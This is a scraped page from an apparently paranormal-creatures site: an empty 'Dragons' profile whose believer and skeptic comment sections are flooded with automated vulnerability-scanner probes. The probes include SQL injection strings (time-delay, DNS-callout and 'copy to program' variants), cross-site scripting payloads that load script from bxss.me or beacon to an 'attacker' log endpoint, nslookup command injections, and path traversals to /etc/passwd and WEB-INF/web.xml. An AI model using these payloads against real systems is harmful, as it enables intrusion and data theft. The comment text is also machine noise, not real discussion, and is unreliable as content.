Tweet

Dragons

picture of dragon

Location:

Height:

Weight:

Danger Level: Medium

Other names:

Category: Creatures/Mystical Beings

Description:

History and Origin:

Stories Say:

Skeptics Say:

Believers Believe:

Close:

Links to other pages:

None for now

Believer Comments


hvdiroys

1


fhssibfc

response.write(9927827*9657632)


fhssibfc

'+response.write(9927827*9657632)+'


hppwqdap

1


fhssibfc

"+response.write(9927827*9657632)+"


hppwqdap

1


response.write(9732510*9956683)

1


hppwqdap

-1 OR 2+623-623-1=0+0+0+1 --


'+response.write(9732510*9956683)+'

1


hppwqdap

-1 OR 3+623-623-1=0+0+0+1 --


"+response.write(9732510*9956683)+"

1


hppwqdap

-1 OR 3*2<(0+5+623-623) --


hppwqdap

-1 OR 3*2>(0+5+623-623) --


moexfxmn

1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-726&h=487-cef54-2&/).slice(2),document.documentElement.appendChild(s))//'>


hppwqdap

-1 OR 2+110-110-1=0+0+0+1


mdlrural

set|set&set


hppwqdap

-1 OR 3+110-110-1=0+0+0+1


moexfxmn

1'>"><script src=http://bxss.me/s?u=013511&r=487-728&h=487-cef54-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-728,487,cef54,%22%5D"/>


mdlrural

$(nslookup dns.ce.\013511.487-729.487.cef54.\1.bxss.me)


vsxhmqes

x7b1Vqr6


hppwqdap

-1 OR 3*2<(0+5+110-110)


moexfxmn</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-730&h=487-cef54-2&/).slice(2),document.documentElement.appendChild(s))//'>

1


mdlrural

&nslookup dns.ce.\013511.487-731.487.cef54.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-731.487.cef54.\1.bxss.me&`'


tejunwai

../../../../../../../../../../etc/passwd


xHddrd1L

1


hppwqdap

-1 OR 3*2>(0+5+110-110)


moexfxmn'>"><script src=http://bxss.me/s?u=013511&r=487-732&h=487-cef54-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-732,487,cef54,%22%5D"/>

1


set|set&set

1


tejunwai

../../../../../../../../../../../../../../../proc/version


hppwqdap

-1' OR 2+400-400-1=0+0+0+1 --


$(nslookup dns.ce.\013511.487-733.487.cef54.\1.bxss.me)

1


tejunwai

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


wpptpipg

1 bcc:013511.487-734.487.cef54.1@bxss.me


hppwqdap

-1' OR 3+400-400-1=0+0+0+1 --


tejunwai

../../../../../../../../../../etc/passwd.jpg


&nslookup dns.ce.\013511.487-735.487.cef54.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-735.487.cef54.\1.bxss.me&`'

1


wpptpipg

to@example.com> bcc:013511.487-736.487.cef54.1@bxss.me


hppwqdap

-1' OR 3*2<(0+5+400-400) --


gdvjijhw

1


tejunwai

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


wpptpipg bcc:013511.487-737.487.cef54.1@bxss.me

1


hppwqdap

-1' OR 3*2>(0+5+400-400) --


weyauxyl

${9999851+9999130}


tejunwai

/../..//../..//../..//../..//../..//etc/passwd.jpg


icrkcoga

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


to@example.com> bcc:013511.487-738.487.cef54.1@bxss.me

1


hppwqdap

-1' OR 2+456-456-1=0+0+0+1 or 'lEmI2Toa'='


${9999113+10000171}

1


icrkcoga

1some_inexistent_file_with_long_name.jpg


tejunwai

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


hppwqdap

-1' OR 3+456-456-1=0+0+0+1 or 'lEmI2Toa'='


icrkcoga

Http://testasp.vulnweb.com/t/fit.txt


tejunwai

/etc/passwd


hppwqdap

-1' OR 3*2<(0+5+456-456) or 'lEmI2Toa'='


icrkcoga

http://testasp.vulnweb.com/t/fit.txt?.jpg


tejunwai

%2fetc%2fpasswd


hppwqdap

-1' OR 3*2>(0+5+456-456) or 'lEmI2Toa'='


MUtBMGFkWDM=

1


icrkcoga

testasp.vulnweb.com


tejunwai

/.././.././.././.././.././.././.././../etc/./passwd%00


hppwqdap

-1" OR 2+70-70-1=0+0+0+1 --


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1


tejunwai

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd


hppwqdap

-1" OR 3+70-70-1=0+0+0+1 --


1some_inexistent_file_with_long_name.jpg

1


isvcrtmg

1&n979970=v966806


tejunwai

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd


hppwqdap

-1" OR 3*2<(0+5+70-70) --


Http://testasp.vulnweb.com/t/fit.txt

1


khfareui&n972756=v944841

1


qmooulbo

)


hppwqdap

-1" OR 3*2>(0+5+70-70) --


http://testasp.vulnweb.com/t/fit.txt?.jpg

1


qmooulbo

!(()&&!|*|*|


hppwqdap

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/


tejunwai

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.


testasp.vulnweb.com

1


qmooulbo

^(#$!@#$)(()))******


hppwqdap

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/


tejunwai

file:///etc/passwd


)

1


hppwqdap

-1; waitfor delay '0:0:3' --


tejunwai

/\../\../\../\../\../\../\../etc/passwd


!(()&&!|*|*|

1


hppwqdap

-1); waitfor delay '0:0:3' --


tejunwai

WEB-INF/web.xml


cyfnwgol

'"()


^(#$!@#$)(()))******

1


hppwqdap

1 waitfor delay '0:0:3' --


wtmbbhfk

;print(md5(acunetix_wvs_security_test));


gdvjijhw

1


tejunwai

/WEB-INF/web.xml


hppwqdap

qCgpARHK'; waitfor delay '0:0:3' --


Anonymous Poster

1


Anonymous Poster

1


tejunwai

WEB-INF\web.xml


hppwqdap

-1;select pg_sleep(3); --


wtmbbhfk

';print(md5(acunetix_wvs_security_test));$a='


Anonymous Poster

1


../../../../../../../../../../etc/passwd

1


hppwqdap

-1);select pg_sleep(6); --


wtmbbhfk

";print(md5(acunetix_wvs_security_test));$a="


'"()

1


Anonymous Poster

1


../../../../../../../../../../../../../../../proc/version

1


wtmbbhfk

${@print(md5(acunetix_wvs_security_test))}


hppwqdap

-1));select pg_sleep(6); --


wtmbbhfk

${@print(md5(acunetix_wvs_security_test))}\


hppwqdap

zaQETU5u';select pg_sleep(6); --


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


;print(md5(acunetix_wvs_security_test));

1


hppwqdap

OseGKuK7');select pg_sleep(6); --


../../../../../../../../../../etc/passwd.jpg

1


jfqofdtu

http://testasp.vulnweb.com/t/xss.html?%00.jpg


hppwqdap

rZAY1asa'));select pg_sleep(6); --


';print(md5(acunetix_wvs_security_test));$a='

1


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1


http://testasp.vulnweb.com/t/xss.html?%00.jpg

1


hppwqdap

1||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-739.487.cef54.1.bxss'||'.me')


tjpauqvq

1


kxexamim

http://hitkhP4DHHkcZ.bxss.me/


/../..//../..//../..//../..//../..//etc/passwd.jpg

1


";print(md5(acunetix_wvs_security_test));$a="

1


hppwqdap

'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-740.487.cef54.1.bxss'||'.me')||'


.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1


${@print(md5(acunetix_wvs_security_test))}

1


tjpauqvq

m_dragons.php


raauauyp

1


hppwqdap

1;copy (select '') to program 'nslookup dns.sqli.\013511.487-741.487.cef54.\1.bxss.me'


/etc/passwd

1


http://hitHSTgTofcPQ.bxss.me/

1


${@print(md5(acunetix_wvs_security_test))}\

1


tjpauqvq

m_dragons.php


%2fetc%2fpasswd

1


hppwqdap

1';copy (select '') to program 'nslookup dns.sqli.\013511.487-742.487.cef54.\1.bxss.me


raauauyp

1'"


tjpauqvq

m_dragons.php/.


/.././.././.././.././.././.././.././../etc/./passwd%00

1


hppwqdap

943'


raauauyp

\


tjpauqvq

1


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1


artnowoi

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


hppwqdap

1


xhilyvck

/www.vulnweb.com


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1


raauauyp

@@4uTr0


hppwqdap

1


m_dragons.php

1


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1


xhilyvck

937493


Anonymous Poster

1


raauauyp

JyI=


-1 OR 2+967-967-1=0+0+0+1 --

1


xhilyvck

http://www.vulnweb.com


m_dragons.php

1


-1 OR 3+967-967-1=0+0+0+1 --

1


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1


xhilyvck

//www.vulnweb.com


m_dragons.php/.

1


-1 OR 3*2<(0+5+967-967) --

1


xhilyvck

/\www.vulnweb.com


poetbjqq

'"


file:///etc/passwd

1


-1 OR 3*2>(0+5+967-967) --

1


raauauyp

1


/www.vulnweb.com

1


txfqssdr

1'"()&%<acx><ScRiPt >F7Kb(9488)</ScRiPt>


poetbjqq

<!--


/\../\../\../\../\../\../\../etc/passwd

1


1'"

1


txfqssdr

'"()&%<acx><ScRiPt >F7Kb(9168)</ScRiPt>


'"

1


-1 OR 2+784-784-1=0+0+0+1

1


\

1


WEB-INF/web.xml

1


916828

1


txfqssdr

19381949


<!--

1


Anonymous Poster

1


/WEB-INF/web.xml

1


txfqssdr

acu3070<s1﹥s2ʺs3ʹuca3070


-1 OR 3+784-784-1=0+0+0+1

1


@@jbX6U

1


http://www.vulnweb.com

1


WEB-INF\web.xml

1


-1 OR 3*2<(0+5+784-784)

1


JyI=

1


-1 OR 3*2>(0+5+784-784)

1


//www.vulnweb.com

1


Anonymous Poster

1


txfqssdr

{{9999676*9999912}}


-1' OR 2+57-57-1=0+0+0+1 --

1


Anonymous Poster

1


/\www.vulnweb.com

1


-1' OR 3+57-57-1=0+0+0+1 --

1


txfqssdr

1<ScRiPt >F7Kb(9900)</ScRiPt>


-1' OR 3*2<(0+5+57-57) --

1


txfqssdr

1<WFPYAS>IUMA0[!+!]</WFPYAS>


-1' OR 3*2>(0+5+57-57) --

1


txfqssdr

1<script>F7Kb(9480)</script>


-1' OR 2+297-297-1=0+0+0+1 or 'LpyMylLI'='

1


txfqssdr

1<ScR<ScRiPt>IpT>F7Kb(9654)</sCr<ScRiPt>IpT>


-1' OR 3+297-297-1=0+0+0+1 or 'LpyMylLI'='

1


txfqssdr

1<ScRiPt >F7Kb(9891)</ScRiPt>


-1' OR 3*2<(0+5+297-297) or 'LpyMylLI'='

1


txfqssdr

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9329></ScRiPt>


txfqssdr

1<ScRiPt >F7Kb(9187)</ScRiPt>


-1' OR 3*2>(0+5+297-297) or 'LpyMylLI'='

1


txfqssdr

1<video><source onerror="javascript:F7Kb(9497)">


-1" OR 2+996-996-1=0+0+0+1 --

1


txfqssdr

1<isindex type=image src=1 onerror=F7Kb(9828)>


-1" OR 3+996-996-1=0+0+0+1 --

1


txfqssdr

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9187'>


-1" OR 3*2<(0+5+996-996) --

1


txfqssdr

1<body onload=F7Kb(9664)>


-1" OR 3*2>(0+5+996-996) --

1


txfqssdr

1<img src=//testasp.vulnweb.com/t/dot.gif onload=F7Kb(9164)>


txfqssdr

1<img src=xyz OnErRor=F7Kb(9620)>


if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1


txfqssdr

1<img/src=">" onerror=alert(9852)>


(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1


txfqssdr

%31%3C%53%63%52%69%50%74%20%3E%46%37%4B%62%289058%29%3C%2F%73%43%72%69%70%54%3E


1 waitfor delay '0:0:3' --

1


txfqssdr

1\u003CScRiPt\F7Kb(9232)\u003C/sCripT\u003E


KUNY9FYl'; waitfor delay '0:0:3' --

1


tzWmcm2v';select pg_sleep(3); --

1


txfqssdr

1&lt;ScRiPt&gt;F7Kb(9908)&lt;/sCripT&gt;


aKlzY10S');select pg_sleep(3); --

1


dq99aLsf'));select pg_sleep(6); --

1


'||UTL_INADDR.get_host_address('dns.'||'sqli.013511.487-757.487.cef54.1.bxss'||'.me')||'

1


txfqssdr

1<input autofocus onfocus=F7Kb(9734)>


hppwqdap';copy (select '') to program 'nslookup dns.sqli.\013511.487-758.487.cef54.\1.bxss.me

1


txfqssdr

<a HrEF=http://www.vulnweb.com></a>


258'

1


txfqssdr

<a HrEF=jaVaScRiPT:>


txfqssdr

[url=http://www.vulnweb.com][/url]


txfqssdr

1<img<!-- --> src=x onerror=alert(9204);//><!-- -->


txfqssdr

1}body{acu:Expre/**/SSion(F7Kb(9142))}


txfqssdr

1<% contenteditable onresize=F7Kb(9218)>


txfqssdr

1cKP1y <ScRiPt >F7Kb(9974)</ScRiPt>


txfqssdr

1<WUEOL0>EO0FO[!+!]</WUEOL0>


txfqssdr

1<ifRAme sRc=9825.com></IfRamE>


txfqssdr

1<ujqLe4 x=9685>


txfqssdr

1<img sRc='http://attacker-9329/log.php?


txfqssdr

1<8y5mYu<


txfqssdr'"()&%<acx><ScRiPt >F7Kb(9805)</ScRiPt>

1


'"()&%<acx><ScRiPt >F7Kb(9894)</ScRiPt>

1


txfqssdr9004822

1


acu10234<s1﹥s2ʺs3ʹuca10234

1


Anonymous Poster

1


Anonymous Poster

1


{{9999913*10000143}}

1


txfqssdr<ScRiPt >F7Kb(9255)</ScRiPt>

1


txfqssdr<W4OVAQ>WDJGP[!+!]</W4OVAQ>

1


txfqssdr<script>F7Kb(9930)</script>

1


txfqssdr<ScR<ScRiPt>IpT>F7Kb(9223)</sCr<ScRiPt>IpT>

1


txfqssdr<ScRiPt >F7Kb(9540)</ScRiPt>

1


txfqssdr<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9060></ScRiPt>

1


txfqssdr<ScRiPt >F7Kb(9639)</ScRiPt>

1


txfqssdr<video><source onerror="javascript:F7Kb(9318)">

1


Anonymous Poster

1


txfqssdr<isindex type=image src=1 onerror=F7Kb(9558)>

1


txfqssdr<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9471'>

1


txfqssdr<body onload=F7Kb(9974)>

1


txfqssdr<img src=//testasp.vulnweb.com/t/dot.gif onload=F7Kb(9347)>

1


txfqssdr<img src=xyz OnErRor=F7Kb(9960)>

1


txfqssdr<img/src=">" onerror=alert(9251)>

1


%74%78%66%71%73%73%64%72%3C%53%63%52%69%50%74%20%3E%46%37%4B%62%289582%29%3C%2F%73%43%72%69%70%54%3E

1


txfqssdr\u003CScRiPt\F7Kb(9297)\u003C/sCripT\u003E

1


txfqssdr&lt;ScRiPt&gt;F7Kb(9150)&lt;/sCripT&gt;

1


Anonymous Poster

1


txfqssdr<input autofocus onfocus=F7Kb(9540)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


txfqssdr<img<!-- --> src=x onerror=alert(9252);//><!-- -->

1


txfqssdr}body{acu:Expre/**/SSion(F7Kb(9857))}

1


txfqssdr<% contenteditable onresize=F7Kb(9035)>

1


txfqssdrWKvV7 <ScRiPt >F7Kb(9210)</ScRiPt>

1


txfqssdr<WQ11SK>M64AI[!+!]</WQ11SK>

1


txfqssdr<ifRAme sRc=9802.com></IfRamE>

1


txfqssdr<g4b3yg x=9970>

1


txfqssdr<img sRc='http://attacker-9196/log.php?

1


txfqssdr<PuqnOd<

1


dweugmtk

1acuMFjCx965pj


1acuSGlehhuysh

1


dpvjmvvg

1'"()&%<acx><ScRiPt >VLtP(9123)</ScRiPt>


dpvjmvvg

'"()&%<acx><ScRiPt >VLtP(9093)</ScRiPt>


dpvjmvvg

19060299


dpvjmvvg

acu5536<s1﹥s2ʺs3ʹuca5536


dpvjmvvg

{{10000081*10000073}}


dpvjmvvg

1<ScRiPt >VLtP(9301)</ScRiPt>


dpvjmvvg

1<W8DOJJ>4MWCS[!+!]</W8DOJJ>


dpvjmvvg

1<script>VLtP(9756)</script>


dpvjmvvg

1<ScR<ScRiPt>IpT>VLtP(9278)</sCr<ScRiPt>IpT>


dpvjmvvg

1<ScRiPt >VLtP(9727)</ScRiPt>


dpvjmvvg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9059></ScRiPt>


dpvjmvvg

1<ScRiPt >VLtP(9674)</ScRiPt>


dpvjmvvg

1<video><source onerror="javascript:VLtP(9659)">


dpvjmvvg

1<isindex type=image src=1 onerror=VLtP(9253)>


dpvjmvvg

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9146'>


dpvjmvvg

1<body onload=VLtP(9766)>


dpvjmvvg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9307)>


dpvjmvvg

1<img src=xyz OnErRor=VLtP(9797)>


dpvjmvvg

1<img/src=">" onerror=alert(9478)>


dpvjmvvg

%31%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289667%29%3C%2F%73%43%72%69%70%54%3E


dpvjmvvg

1\u003CScRiPt\VLtP(9013)\u003C/sCripT\u003E


dpvjmvvg

1&lt;ScRiPt&gt;VLtP(9287)&lt;/sCripT&gt;


dpvjmvvg

1<input autofocus onfocus=VLtP(9689)>


dpvjmvvg

<a HrEF=http://www.vulnweb.com></a>


dpvjmvvg

<a HrEF=jaVaScRiPT:>


dpvjmvvg

[url=http://www.vulnweb.com][/url]


dpvjmvvg

1<img<!-- --> src=x onerror=alert(9795);//><!-- -->


dpvjmvvg

1}body{acu:Expre/**/SSion(VLtP(9114))}


dpvjmvvg

1<% contenteditable onresize=VLtP(9880)>


dpvjmvvg

1C89S5 <ScRiPt >VLtP(9029)</ScRiPt>


dpvjmvvg

1<WJNTGJ>HBMPX[!+!]</WJNTGJ>


dpvjmvvg

1<ifRAme sRc=9312.com></IfRamE>


dpvjmvvg

1<6ZW4k2 x=9314>


dpvjmvvg

1<img sRc='http://attacker-9854/log.php?


dpvjmvvg

1<jTHvnP<


wyhdluyj'"()&%<acx><ScRiPt >VLtP(9549)</ScRiPt>

1


'"()&%<acx><ScRiPt >VLtP(9934)</ScRiPt>

1


wyhdluyj9791289

1


acu6624<s1﹥s2ʺs3ʹuca6624

1


Anonymous Poster

1


Anonymous Poster

1


{{9999846*10000384}}

1


wyhdluyj<ScRiPt >VLtP(9724)</ScRiPt>

1


wyhdluyj<W7U7OO>IAFUT[!+!]</W7U7OO>

1


wyhdluyj<script>VLtP(9782)</script>

1


wyhdluyj<ScR<ScRiPt>IpT>VLtP(9575)</sCr<ScRiPt>IpT>

1


wyhdluyj<ScRiPt >VLtP(9276)</ScRiPt>

1


wyhdluyj<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9235></ScRiPt>

1


wyhdluyj<ScRiPt >VLtP(9437)</ScRiPt>

1


wyhdluyj<video><source onerror="javascript:VLtP(9439)">

1


Anonymous Poster

1


wyhdluyj<isindex type=image src=1 onerror=VLtP(9403)>

1


wyhdluyj<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9359'>

1


wyhdluyj<body onload=VLtP(9915)>

1


wyhdluyj<img src=//testasp.vulnweb.com/t/dot.gif onload=VLtP(9374)>

1


wyhdluyj<img src=xyz OnErRor=VLtP(9336)>

1


wyhdluyj<img/src=">" onerror=alert(9077)>

1


%77%79%68%64%6C%75%79%6A%3C%53%63%52%69%50%74%20%3E%56%4C%74%50%289697%29%3C%2F%73%43%72%69%70%54%3E

1


wyhdluyj\u003CScRiPt\VLtP(9847)\u003C/sCripT\u003E

1


wyhdluyj&lt;ScRiPt&gt;VLtP(9445)&lt;/sCripT&gt;

1


Anonymous Poster

1


wyhdluyj<input autofocus onfocus=VLtP(9860)>

1


<a HrEF=http://www.vulnweb.com></a>

1


<a HrEF=jaVaScRiPT:>

1


[url=http://www.vulnweb.com][/url]

1


wyhdluyj<img<!-- --> src=x onerror=alert(9135);//><!-- -->

1


wyhdluyj}body{acu:Expre/**/SSion(VLtP(9245))}

1


wyhdluyj<% contenteditable onresize=VLtP(9783)>

1


wyhdluyjOgjmC <ScRiPt >VLtP(9545)</ScRiPt>

1


wyhdluyj<WDX0BU>28CDM[!+!]</WDX0BU>

1


wyhdluyj<ifRAme sRc=9022.com></IfRamE>

1


wyhdluyj<tvx14W x=9237>

1


wyhdluyj<img sRc='http://attacker-9105/log.php?

1


wyhdluyj<kaa8Lq<

1



Post a comment:





Skeptic Comments


lhgqecgl

1


gvfiqtqx

response.write(9671448*9040717)


nggxgjkk

1


gvfiqtqx

'+response.write(9671448*9040717)+'


nggxgjkk

1


gvfiqtqx

"+response.write(9671448*9040717)+"


fwpxectp

1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-743&h=487-f3c47-2&/).slice(2),document.documentElement.appendChild(s))//'>


nggxgjkk

-1 OR 2+842-842-1=0+0+0+1 --


response.write(9912488*9364215)

1


nggxgjkk

-1 OR 3+842-842-1=0+0+0+1 --


vnioqfjo

set|set&set


'+response.write(9912488*9364215)+'

1


celecbuv

0n7aVUG5


nggxgjkk

-1 OR 3*2<(0+5+842-842) --


fwpxectp

1'>"><script src=http://bxss.me/s?u=013511&r=487-744&h=487-f3c47-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-744,487,f3c47,%22%5D"/>


vnioqfjo

$(nslookup dns.ce.\013511.487-745.487.f3c47.\1.bxss.me)


"+response.write(9912488*9364215)+"

1


nggxgjkk

-1 OR 3*2>(0+5+842-842) --


fwpxectp</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013511&r=487-746&h=487-f3c47-2&/).slice(2),document.documentElement.appendChild(s))//'>

1


vnioqfjo

&nslookup dns.ce.\013511.487-747.487.f3c47.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-747.487.f3c47.\1.bxss.me&`'


9jkdFJUy

1


nggxgjkk

-1 OR 2+541-541-1=0+0+0+1


fwpxectp'>"><script src=http://bxss.me/s?u=013511&r=487-748&h=487-f3c47-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,013511,487-748,487,f3c47,%22%5D"/>

1


ihnbggln

../../../../../../../../../../etc/passwd


set|set&set

1


nggxgjkk

-1 OR 3+541-541-1=0+0+0+1


ihnbggln

../../../../../../../../../../../../../../../proc/version


$(nslookup dns.ce.\013511.487-749.487.f3c47.\1.bxss.me)

1


wxmkwqfj

1 bcc:013511.487-750.487.f3c47.1@bxss.me


&nslookup dns.ce.\013511.487-751.487.f3c47.\1.bxss.me&'\"`0&nslookup dns.ce.\013511.487-751.487.f3c47.\1.bxss.me&`'

1


ihnbggln

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


nggxgjkk

-1 OR 3*2<(0+5+541-541)


ihnbggln

../../../../../../../../../../etc/passwd.jpg


wxmkwqfj

to@example.com> bcc:013511.487-752.487.f3c47.1@bxss.me


lldikfoc

1


ihnbggln

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg


wxmkwqfj bcc:013511.487-753.487.f3c47.1@bxss.me

1


nggxgjkk

-1 OR 3*2>(0+5+541-541)


manieoah

${9999373+10000181}


ihnbggln

/../..//../..//../..//../..//../..//etc/passwd.jpg


to@example.com> bcc:013511.487-754.487.f3c47.1@bxss.me

1


nggxgjkk

-1' OR 2+986-986-1=0+0+0+1 --


ihnbggln

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd


${9999739+9999967}

1


nggxgjkk

-1' OR 3+986-986-1=0+0+0+1 --


ihnbggln

/etc/passwd


icgshjob

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg


ihnbggln

%2fetc%2fpasswd


nggxgjkk

-1' OR 3*2<(0+5+986-986) --


